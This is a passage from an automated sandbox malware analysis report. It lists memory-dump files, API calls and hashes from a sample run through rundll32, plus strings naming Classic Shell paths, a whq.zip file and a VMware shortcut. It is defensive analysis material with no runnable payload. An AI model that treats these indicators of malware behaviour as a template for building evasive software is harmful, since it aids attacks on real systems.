                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID: H
                          • API String ID: 3997070919-2852464175
                          • Opcode ID: 30cc7c901468aa6c039c49a4b99583d2ae127ef8a94102a5ddf9ab6e92f1fcf1
                          • Instruction ID: f58c7f49896669e3bc5366d2f1a89d8218bc85e1ff750a212dc5ff7a982ca0f3
                          • Opcode Fuzzy Hash: 30cc7c901468aa6c039c49a4b99583d2ae127ef8a94102a5ddf9ab6e92f1fcf1
                          • Instruction Fuzzy Hash: 70D1E032209B8486D730DB16E49439BB7A5F388798F50812AEBCD47B68DF7CC994CB05
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetMessageW.USER32 ref: 00816038
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • Sleep.KERNEL32 ref: 00815FC0
                          Strings
                          • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                          • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                          • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                          • \VMware Workstation.lnk, xrefs: 00815F58
                          • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFileMessageSleep
                          • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                          • API String ID: 2390311571-3073936675
                          • Opcode ID: c6a53140604d0a2ed15e4ac568e0721caa2aa8183d7ed21a9e78ca7ab6707819
                          • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                          • Opcode Fuzzy Hash: c6a53140604d0a2ed15e4ac568e0721caa2aa8183d7ed21a9e78ca7ab6707819
                          • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetLastError.KERNEL32 ref: 005115CB
                            • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                          • GetLastError.KERNEL32 ref: 00511666
                            • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                            • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                          • String ID: XLM$5B
                          • API String ID: 3390516113-4037079664
                          • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                          • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                          • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • LeaveCriticalSection.KERNEL32 ref: 00414771
                          • EnterCriticalSection.KERNEL32 ref: 00414847
                          • LeaveCriticalSection.KERNEL32 ref: 00414880
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                          • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 308 436960-436983 call 411140 GetFileAttributesW 311 436989-436991 308->311 312 436a4e-436a56 GetLastError 308->312 315 436993-43699d 311->315 316 4369a2-4369a4 311->316 313 436a79-436a7c 312->313 314 436a58-436a5b 312->314 317 436a81-436a8d 313->317 314->313 318 436a5d-436a63 314->318 315->317 319 4369a6-4369db CreateFileW 316->319 320 4369f8-4369fe 316->320 318->313 324 436a65-436a68 318->324 319->317 321 4369e1-4369f3 CloseHandle 319->321 322 436a00-436a03 320->322 323 436a05-436a3a call 420600 320->323 321->317 322->317 330 436a49-436a4c 323->330 331 436a3c-436a47 call 420550 323->331 324->313 326 436a6a-436a6d 324->326 326->313 328 436a6f-436a72 326->328 328->313 329 436a74-436a77 328->329 329->313 332 436a7e 329->332 330->317 331->317 332->317
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$AttributesCloseCreateErrorHandleLast
                          • String ID:
                          • API String ID: 2927643983-0
                          • Opcode ID: 28ac7a88db5b09650cc3124807783d47f1c76224b3e5616c29fb8e505945dcf2
                          • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                          • Opcode Fuzzy Hash: 28ac7a88db5b09650cc3124807783d47f1c76224b3e5616c29fb8e505945dcf2
                          • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 359 43ea00-43ea29 360 43ea32-43ea66 FormatMessageW 359->360 361 43ea2b 359->361 362 43ea6c-43ea70 360->362 361->360 363 43ea72-43ea88 362->363 364 43ea90-43eab4 call 4100a0 LocalFree 362->364 365 43ea8a-43ea8e 363->365 366 43ea68 363->366 365->364 365->366 366->362
                          APIs
                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                          • LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
